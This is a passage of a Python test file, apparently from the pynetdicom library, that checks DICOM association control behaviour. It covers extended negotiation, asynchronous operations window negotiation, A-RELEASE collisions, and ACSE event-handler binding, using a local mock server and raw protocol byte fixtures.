assert assoc.is_established
req = {
"1.2.3": ("1.2.840.10008.4.2", []),
"1.2.3.1": ("1.2.840.10008.4.2", ["1.1.1", "1.4.2"]),
"1.2.3.4": ("1.2.111111", []),
"1.2.3.5": ("1.2.111111", ["1.2.4", "1.2.840.10008.1.1"]),
}
scp_assoc = scp.active_associations[0]
items = {}
for kk, vv in req.items():
item = SOPClassCommonExtendedNegotiation()
item.sop_class_uid = kk
item.service_class_uid = vv[0]
item.related_general_sop_class_identification = vv[1]
items[kk] = item
scp_assoc.requestor.user_information.extend(items.values())
rsp = scp_assoc.acse._check_sop_class_common_extended()
assert rsp == {}
assoc.release()
scp.shutdown()
def test_functional_no_response(self):
"""Test a functional workflow with no response."""
def handle(event):
return {}
handlers = [(evt.EVT_SOP_COMMON, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
req = {
"1.2.3": ("1.2.840.10008.4.2", []),
"1.2.3.1": ("1.2.840.10008.4.2", ["1.1.1", "1.4.2"]),
"1.2.3.4": ("1.2.111111", []),
"1.2.3.5": ("1.2.111111", ["1.2.4", "1.2.840.10008.1.1"]),
}
ext_neg = []
for kk, vv in req.items():
item = SOPClassCommonExtendedNegotiation()
item.sop_class_uid = kk
item.service_class_uid = vv[0]
item.related_general_sop_class_identification = vv[1]
ext_neg.append(item)
assoc = ae.associate("localhost", 11112, ext_neg=ext_neg)
assert assoc.is_established
assert assoc.acceptor.accepted_common_extended == {}
scp_assoc = scp.active_associations[0]
assert scp_assoc.acceptor.accepted_common_extended == {}
assoc.release()
scp.shutdown()
def test_functional_response(self):
"""Test a functional workflow with response."""
def handle(event):
del event.items["1.2.3.1"]
return event.items
handlers = [(evt.EVT_SOP_COMMON, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
req = {
"1.2.3": ("1.2.840.10008.4.2", []),
"1.2.3.1": ("1.2.840.10008.4.2", ["1.1.1", "1.4.2"]),
"1.2.3.4": ("1.2.111111", []),
"1.2.3.5": ("1.2.111111", ["1.2.4", "1.2.840.10008.1.1"]),
}
ext_neg = []
for kk, vv in req.items():
item = SOPClassCommonExtendedNegotiation()
item.sop_class_uid = kk
item.service_class_uid = vv[0]
item.related_general_sop_class_identification = vv[1]
ext_neg.append(item)
assoc = ae.associate("localhost", 11112, ext_neg=ext_neg)
assert assoc.is_established
scp_assoc = scp.active_associations[0]
acc = scp_assoc.acceptor.accepted_common_extended
assert len(acc) == 3
assert acc["1.2.3"] == req["1.2.3"]
assert acc["1.2.3.4"] == req["1.2.3.4"]
assert acc["1.2.3.5"] == req["1.2.3.5"]
assoc.release()
scp.shutdown()
class TestAsyncOpsNegotiation:
"""Tests for Asynchronous Operations Window Negotiation."""
def setup(self):
"""Run prior to each test"""
self.ae = None
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
def test_check_async_no_req(self):
"""Test the default evt.EVT_ASYNC_OPS handler"""
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
scp_assoc = scp.active_associations[0]
rsp = scp_assoc.acse._check_async_ops()
assert rsp is None
assoc.release()
scp.shutdown()
def test_check_user_implemented_none(self):
"""Test the response when user callback returns values."""
def handle(event):
return 1, 2
handlers = [(evt.EVT_ASYNC_OPS, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
scp_assoc = scp.active_associations[0]
rsp = scp_assoc.acse._check_async_ops()
assert isinstance(rsp, AsynchronousOperationsWindowNegotiation)
assert rsp.maximum_number_operations_invoked == 1
assert rsp.maximum_number_operations_performed == 1
assoc.release()
scp.shutdown()
def test_check_user_implemented_raises(self):
"""Test the response when the user callback raises exception."""
def handle(event):
raise ValueError
return 1, 2
handlers = [(evt.EVT_ASYNC_OPS, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
scp_assoc = scp.active_associations[0]
rsp = scp_assoc.acse._check_async_ops()
assert isinstance(rsp, AsynchronousOperationsWindowNegotiation)
assert rsp.maximum_number_operations_invoked == 1
assert rsp.maximum_number_operations_performed == 1
assoc.release()
scp.shutdown()
def test_req_response_reject(self):
"""Test requestor response if assoc rejected."""
def handle(event):
return 1, 2
handlers = [(evt.EVT_ASYNC_OPS, handle)]
self.ae = ae = AE()
ae.require_calling_aet = ["HAHA NOPE"]
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
ext_neg = []
item = AsynchronousOperationsWindowNegotiation()
item.maximum_number_operations_invoked = 0
item.maximum_number_operations_performed = 1
ext_neg.append(item)
assoc = ae.associate("localhost", 11112, ext_neg=ext_neg)
assert assoc.is_rejected
assert assoc.acceptor.asynchronous_operations == (1, 1)
assoc.release()
scp.shutdown()
def test_req_response_no_response(self):
"""Test requestor response if no response from acceptor."""
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False)
ae.acse_timeout = 5
ae.dimse_timeout = 5
ext_neg = []
item = AsynchronousOperationsWindowNegotiation()
item.maximum_number_operations_invoked = 0
item.maximum_number_operations_performed = 1
ext_neg.append(item)
assoc = ae.associate("localhost", 11112, ext_neg=ext_neg)
assert assoc.is_established
assert assoc.acceptor.asynchronous_operations == (1, 1)
assoc.release()
scp.shutdown()
def test_req_response_async(self):
"""Test requestor response if response received"""
def handle(event):
return event.invoked, event.performed
handlers = [(evt.EVT_ASYNC_OPS, handle)]
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
ae.acse_timeout = 5
ae.dimse_timeout = 5
ext_neg = []
item = AsynchronousOperationsWindowNegotiation()
item.maximum_number_operations_invoked = 0
item.maximum_number_operations_performed = 2
ext_neg.append(item)
assoc = ae.associate("localhost", 11112, ext_neg=ext_neg)
assert assoc.is_established
# Because pynetdicom doesn't support async ops this is always 1, 1
assert assoc.acceptor.asynchronous_operations == (1, 1)
assoc.release()
scp.shutdown()
class TestNegotiateRelease:
"""Tests for ACSE.negotiate_release."""
def setup(self):
"""Run prior to each test"""
self.scp = None
def teardown(self):
"""Clear any active threads"""
if self.scp:
self.scp.shutdown()
def create_assoc(self):
ae = AE()
ae.add_requested_context(Verification)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode="requestor")
assoc.set_socket(AssociationSocket(assoc))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = "ANY_SCU"
assoc.acceptor.address = "localhost"
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ""
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = ae.implementation_class_uid
assoc.requestor.implementation_version_name = ae.implementation_version_name
cx = build_context(Verification)
cx.context_id = 1
assoc.requestor.requested_contexts = [cx]
return assoc
def create_assoc_acc(self):
# AF_INET: IPv4, SOCK_STREAM: TCP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVTIMEO, pack("ll", 1, 0))
sock.connect(("localhost", 11112))
ae = AE()
ae.add_supported_context(Verification)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode="acceptor")
assoc.set_socket(AssociationSocket(assoc, client_socket=sock))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = "ANY_SCU"
assoc.acceptor.address = "localhost"
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ""
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = ae.implementation_class_uid
assoc.requestor.implementation_version_name = ae.implementation_version_name
cx = build_context(Verification)
cx.context_id = 1
assoc.acceptor.supported_contexts = [cx]
return assoc
def start_server(self, commands):
"""Start the receiving server."""
server = ThreadedParrot(("localhost", 11112), commands, ParrotRequest)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
return server
def test_collision_req(self, caplog):
"""Test a simulated A-RELEASE collision on the requestor side."""
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None), # a-release-rq
("send", a_release_rq), # Cause collision
("recv", None), # a-release-rp
("send", a_release_rp),
]
self.scp = scp = self.start_server(commands)
with caplog.at_level(logging.DEBUG, logger="pynetdicom"):
assoc = self.create_assoc()
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
assoc.release()
assert assoc.is_released
assert "An A-RELEASE collision has occurred" in caplog.text
scp.shutdown()
assert scp.received[1] == a_release_rq
assert scp.received[2] == a_release_rp
def test_release_no_response(self):
"""Test a requestor aborts if no response."""
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None), # a-release-rq
("recv", None), # a-p-abort
]
self.scp = scp = self.start_server(commands)
assoc = self.create_assoc()
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
assoc.release()
assert assoc.is_aborted
scp.shutdown()
assert scp.received[1] == a_release_rq
assert scp.received[2] == a_p_abort[:-1] + b"\x00"
def test_release_p_data(self, caplog):
"""Test receiving P-DATA-TF after release."""
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None), # a_release_rq
("send", p_data_tf),
("send", a_release_rp),
]
self.scp = scp = self.start_server(commands)
assoc = self.create_assoc()
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
with caplog.at_level(logging.DEBUG, logger="pynetdicom"):
assoc.release()
assert assoc.is_released
assert (
"P-DATA received after Association release, data has been lost"
) in caplog.text
scp.shutdown()
assert scp.received[1] == a_release_rq
def test_coll_acc(self, caplog):
"""Test a simulated A-RELEASE collision on the acceptor side."""
def handle(event):
event.assoc._is_paused = True
event.assoc.release()
return 0x0000
# C-ECHO-RQ
# 80 total length
p_data_tf = (
b"\x04\x00\x00\x00\x00\x4a" # P-DATA-TF 74
b"\x00\x00\x00\x46\x01" # PDV Item 70
b"\x03" # PDV: 2 -> 69
b"\x00\x00\x00\x00\x04\x00\x00\x00\x42\x00\x00\x00" # 12 Command Group Length
b"\x00\x00\x02\x00\x12\x00\x00\x00\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e\x31\x00" # 26
b"\x00\x00\x00\x01\x02\x00\x00\x00\x30\x00" # 10 Command Field
b"\x00\x00\x10\x01\x02\x00\x00\x00\x01\x00" # 10 Message ID
b"\x00\x00\x00\x08\x02\x00\x00\x00\x01\x01" # 10 Command Data Set Type
)
commands = [
("send", a_associate_rq),
("recv", None),
("send", p_data_tf),
("recv", None), # a_release_rq
("send", a_release_rq),
("send", a_release_rp),
("recv", None), # a_release_rp
]
self.scp = scu = self.start_server(commands) # Requestor
with caplog.at_level(logging.DEBUG, logger="pynetdicom"):
assoc = self.create_assoc_acc() # Acceptor
assoc.bind(evt.EVT_C_ECHO, handle)
assoc.start()
time.sleep(0.5)
assert "An A-RELEASE collision has occurred" in caplog.text
assert assoc.is_released
scu.shutdown()
assert scu.received[1] == a_release_rq
assert scu.received[2] == a_release_rp
def test_collision_req_abort(self, caplog):
"""Test release collision with acceptor abort."""
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None), # a-release-rq
("send", a_release_rq), # Cause collision
("recv", None), # a-release-rp
("send", a_abort),
]
self.scp = scp = self.start_server(commands)
with caplog.at_level(logging.DEBUG, logger="pynetdicom"):
assoc = self.create_assoc()
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
assoc.release()
assert assoc.is_aborted
assert "An A-RELEASE collision has occurred" in caplog.text
scp.shutdown()
assert scp.received[1] == a_release_rq
assert scp.received[2] == a_release_rp
def test_collision_req_ap_abort(self, caplog):
"""Test release collision with acceptor abort."""
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None), # a-release-rq
("send", a_release_rq), # Cause collision
("recv", None), # a-release-rp
("send", a_p_abort),
]
self.scp = scp = self.start_server(commands)
with caplog.at_level(logging.DEBUG, logger="pynetdicom"):
assoc = self.create_assoc()
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
assoc.release()
assert assoc.is_aborted
assert "An A-RELEASE collision has occurred" in caplog.text
scp.shutdown()
assert scp.received[1] == a_release_rq
assert scp.received[2] == a_release_rp
class TestEventHandlingAcceptor:
"""Test the transport events and handling as acceptor."""
def setup(self):
self.ae = None
_config.LOG_HANDLER_LEVEL = "none"
def teardown(self):
if self.ae:
self.ae.shutdown()
_config.LOG_HANDLER_LEVEL = "standard"
def test_no_handlers(self):
"""Test with no transport event handlers bound."""
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False)
assert scp.get_handlers(evt.EVT_ACSE_RECV) == []
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert len(scp.active_associations) == 1
assert scp.get_handlers(evt.EVT_ACSE_RECV) == []
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assert assoc.get_handlers(evt.EVT_ACSE_RECV) == []
assert assoc.get_handlers(evt.EVT_ACSE_SENT) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_RECV) == []
assert child.get_handlers(evt.EVT_ACSE_SENT) == []
assoc.release()
scp.shutdown()
def test_acse_sent(self):
"""Test binding to EVT_ACSE_SENT."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_SENT, handle)]
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
assert scp.get_handlers(evt.EVT_ACSE_SENT) == [(handle, None)]
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert len(scp.active_associations) == 1
assert scp.get_handlers(evt.EVT_ACSE_SENT) == [(handle, None)]
assert assoc.get_handlers(evt.EVT_ACSE_SENT) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_SENT) == [(handle, None)]
assoc.send_c_echo()
assoc.release()
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 2
event = triggered[0]
assert isinstance(event, Event)
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime)
assert event.event.name == "EVT_ACSE_SENT"
assert isinstance(triggered[0].primitive, A_ASSOCIATE)
assert isinstance(triggered[1].primitive, A_RELEASE)
assert triggered[0].primitive.result == 0x00 ## A-ASSOCIATE (accept)
assert triggered[1].primitive.result is not None ## A-RELEASE (response)
scp.shutdown()
def test_acse_sent_bind(self):
"""Test binding to EVT_ACSE_SENT."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_SENT, handle)]
scp = ae.start_server(("", 11112), block=False)
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.send_c_echo(msg_id=12)
scp.bind(evt.EVT_ACSE_SENT, handle)
assert len(scp.active_associations) == 1
assert scp.get_handlers(evt.EVT_ACSE_SENT) == [(handle, None)]
assert assoc.get_handlers(evt.EVT_ACSE_SENT) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_SENT) == [(handle, None)]
assoc.send_c_echo(msg_id=21)
assoc.release()
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 1
event = triggered[0]
assert isinstance(event, Event)
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime)
assert event.event.name == "EVT_ACSE_SENT"
assert isinstance(triggered[0].primitive, A_RELEASE)
scp.shutdown()
def test_acse_sent_unbind(self):
"""Test unbinding EVT_ACSE_SENT."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_SENT, handle)]
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
assert scp.get_handlers(evt.EVT_ACSE_SENT) == [(handle, None)]
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_SENT) == [(handle, None)]
assert assoc.get_handlers(evt.EVT_ACSE_SENT) == []
assoc.send_c_echo(msg_id=12)
scp.unbind(evt.EVT_ACSE_SENT, handle)
assert len(scp.active_associations) == 1
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_SENT) == []
assoc.send_c_echo(msg_id=21)
assoc.release()
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 1
event = triggered[0]
assert isinstance(event, Event)
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime)
assert event.event.name == "EVT_ACSE_SENT"
assert isinstance(triggered[0].primitive, A_ASSOCIATE)
scp.shutdown()
def test_acse_sent_raises(self, caplog):
"""Test the handler for EVT_ACSE_SENT raising exception."""
def handle(event):
raise NotImplementedError("Exception description")
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_SENT, handle)]
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
with caplog.at_level(logging.ERROR, logger="pynetdicom"):
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.send_c_echo()
assoc.release()
while scp.active_associations:
time.sleep(0.05)
scp.shutdown()
msg = (
"Exception raised in user's 'evt.EVT_ACSE_SENT' event handler"
" 'handle'"
)
assert msg in caplog.text
assert "Exception description" in caplog.text
def test_acse_recv(self):
"""Test starting bound to EVT_ACSE_RECV."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_RECV, handle)]
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
assert scp.get_handlers(evt.EVT_ACSE_RECV) == [(handle, None)]
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert len(scp.active_associations) == 1
assert scp.get_handlers(evt.EVT_ACSE_RECV) == [(handle, None)]
assert assoc.get_handlers(evt.EVT_ACSE_RECV) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_RECV) == [(handle, None)]
assoc.send_c_echo()
assoc.release()
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 2
event = triggered[0]
assert isinstance(event, Event)
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime)
assert isinstance(triggered[0].primitive, A_ASSOCIATE)
assert isinstance(triggered[1].primitive, A_RELEASE)
assert event.event.name == "EVT_ACSE_RECV"
assert triggered[0].primitive.result is None ## A-ASSOCIATE (request)
assert triggered[1].primitive.result is None ## A-RELEASE (request)
scp.shutdown()
def test_acse_recv_bind(self):
"""Test binding to EVT_ACSE_RECV."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False)
assert scp.get_handlers(evt.EVT_ACSE_RECV) == []
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert len(scp.active_associations) == 1
assoc.send_c_echo(msg_id=12)
scp.bind(evt.EVT_ACSE_RECV, handle)
assert scp.get_handlers(evt.EVT_ACSE_RECV) == [(handle, None)]
assert assoc.get_handlers(evt.EVT_ACSE_RECV) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_RECV) == [(handle, None)]
assoc.send_c_echo(msg_id=21)
assoc.release()
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 1
event = triggered[0]
assert isinstance(event, Event)
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime)
assert isinstance(triggered[0].primitive, A_RELEASE)
assert event.event.name == "EVT_ACSE_RECV"
scp.shutdown()
def test_acse_recv_unbind(self):
"""Test unbinding to EVT_ACSE_RECV."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_RECV, handle)]
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
assert scp.get_handlers(evt.EVT_ACSE_RECV) == [(handle, None)]
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert len(scp.active_associations) == 1
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_RECV) == [(handle, None)]
assoc.send_c_echo(msg_id=12)
scp.unbind(evt.EVT_ACSE_RECV, handle)
assert scp.get_handlers(evt.EVT_ACSE_RECV) == []
assert assoc.get_handlers(evt.EVT_ACSE_RECV) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_RECV) == []
assoc.send_c_echo(msg_id=21)
assoc.release()
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 1
event = triggered[0]
assert isinstance(event, Event)
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime)
assert isinstance(triggered[0].primitive, A_ASSOCIATE)
assert event.event.name == "EVT_ACSE_RECV"
scp.shutdown()
def test_acse_recv_raises(self, caplog):
"""Test the handler for EVT_ACSE_RECV raising exception."""
def handle(event):
raise NotImplementedError("Exception description")
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_RECV, handle)]
scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
with caplog.at_level(logging.ERROR, logger="pynetdicom"):
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.send_c_echo()
assoc.release()
while scp.active_associations:
time.sleep(0.05)
scp.shutdown()
msg = (
"Exception raised in user's 'evt.EVT_ACSE_RECV' event handler"
" 'handle'"
)
assert msg in caplog.text
assert "Exception description" in caplog.text
class TestEventHandlingRequestor:
"""Test the transport events and handling as requestor."""
def setup(self):
self.ae = None
_config.LOG_HANDLER_LEVEL = "none"
def teardown(self):
if self.ae:
self.ae.shutdown()
_config.LOG_HANDLER_LEVEL = "standard"
def test_no_handlers(self):
"""Test with no transport event handlers bound."""
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
scp = ae.start_server(("", 11112), block=False)
assert scp.get_handlers(evt.EVT_ACSE_RECV) == []
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert len(scp.active_associations) == 1
assert scp.get_handlers(evt.EVT_ACSE_RECV) == []
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assert assoc.get_handlers(evt.EVT_ACSE_RECV) == []
assert assoc.get_handlers(evt.EVT_ACSE_SENT) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_RECV) == []
assert child.get_handlers(evt.EVT_ACSE_SENT) == []
assoc.release()
scp.shutdown()
def test_acse_sent(self):
"""Test binding to EVT_ACSE_SENT."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_SENT, handle)]
scp = ae.start_server(("", 11112), block=False)
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assoc = ae.associate("localhost", 11112, evt_handlers=handlers)
assert assoc.is_established
assert len(scp.active_associations) == 1
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assert assoc.get_handlers(evt.EVT_ACSE_SENT) == [(handle, None)]
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_SENT) == []
assoc.send_c_echo()
assoc.abort()
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 2
event = triggered[0]
assert isinstance(event, Event)
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime)
assert event.event.name == "EVT_ACSE_SENT"
assert isinstance(triggered[0].primitive, A_ASSOCIATE)
assert isinstance(triggered[1].primitive, A_ABORT)
scp.shutdown()
def test_acse_sent_ap_abort(self):
"""Test binding to EVT_ACSE_SENT."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_SENT, handle)]
scp = ae.start_server(("", 11112), block=False)
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assoc = ae.associate("localhost", 11112, evt_handlers=handlers)
assert assoc.is_established
assert len(scp.active_associations) == 1
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assert assoc.get_handlers(evt.EVT_ACSE_SENT) == [(handle, None)]
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_SENT) == []
assoc.acse.send_ap_abort(0x00)
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 2
event = triggered[0]
assert isinstance(event, Event)
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime)
assert event.event.name == "EVT_ACSE_SENT"
assert isinstance(triggered[0].primitive, A_ASSOCIATE)
assert isinstance(triggered[1].primitive, A_P_ABORT)
scp.shutdown()
def test_acse_sent_bind(self):
"""Test binding to EVT_ACSE_SENT."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_SENT, handle)]
scp = ae.start_server(("", 11112), block=False)
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assoc = ae.associate("localhost", 11112)
assert assoc.get_handlers(evt.EVT_ACSE_SENT) == []
assert assoc.is_established
assoc.send_c_echo(msg_id=12)
assoc.bind(evt.EVT_ACSE_SENT, handle)
assert len(scp.active_associations) == 1
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assert assoc.get_handlers(evt.EVT_ACSE_SENT) == [(handle, None)]
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_SENT) == []
assoc.send_c_echo(msg_id=21)
assoc.release()
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 1
event = triggered[0]
assert isinstance(event, Event)
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime)
assert event.event.name == "EVT_ACSE_SENT"
assert isinstance(triggered[0].primitive, A_RELEASE)
scp.shutdown()
def test_acse_sent_unbind(self):
"""Test unbinding EVT_ACSE_SENT."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_SENT, handle)]
scp = ae.start_server(("", 11112), block=False)
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assoc = ae.associate("localhost", 11112, evt_handlers=handlers)
assert assoc.is_established
assoc.send_c_echo(msg_id=12)
assert len(scp.active_associations) == 1
assert scp.get_handlers(evt.EVT_ACSE_SENT) == []
assert assoc.get_handlers(evt.EVT_ACSE_SENT) == [(handle, None)]
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_SENT) == []
assoc.unbind(evt.EVT_ACSE_SENT, handle)
assert assoc.get_handlers(evt.EVT_ACSE_SENT) == []
assoc.send_c_echo(msg_id=21)
assoc.release()
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 1
assert isinstance(triggered[0].primitive, A_ASSOCIATE)
scp.shutdown()
def test_acse_sent_raises(self, caplog):
"""Test the handler for EVT_ACSE_SENT raising exception."""
def handle(event):
raise NotImplementedError("Exception description")
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_SENT, handle)]
scp = ae.start_server(("", 11112), block=False)
with caplog.at_level(logging.ERROR, logger="pynetdicom"):
assoc = ae.associate("localhost", 11112, evt_handlers=handlers)
assert assoc.is_established
assoc.send_c_echo()
assoc.release()
while scp.active_associations:
time.sleep(0.05)
scp.shutdown()
msg = (
"Exception raised in user's 'evt.EVT_ACSE_SENT' event handler"
" 'handle'"
)
assert msg in caplog.text
assert "Exception description" in caplog.text
def test_acse_recv(self):
"""Test starting bound to EVT_ACSE_RECV."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context(Verification)
ae.add_requested_context(Verification)
handlers = [(evt.EVT_ACSE_RECV, handle)]
scp = ae.start_server(("", 11112), block=False)
assert scp.get_handlers(evt.EVT_ACSE_RECV) == []
assoc = ae.associate("localhost", 11112, evt_handlers=handlers)
assert assoc.is_established
assert len(scp.active_associations) == 1
assert scp.get_handlers(evt.EVT_ACSE_RECV) == []
assert assoc.get_handlers(evt.EVT_ACSE_RECV) == [(handle, None)]
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_ACSE_RECV) == []
assoc.send_c_echo()
assoc.release()
while scp.active_associations:
time.sleep(0.05)
assert len(triggered) == 2
event = triggered[0]
assert isinstance(event, Event)
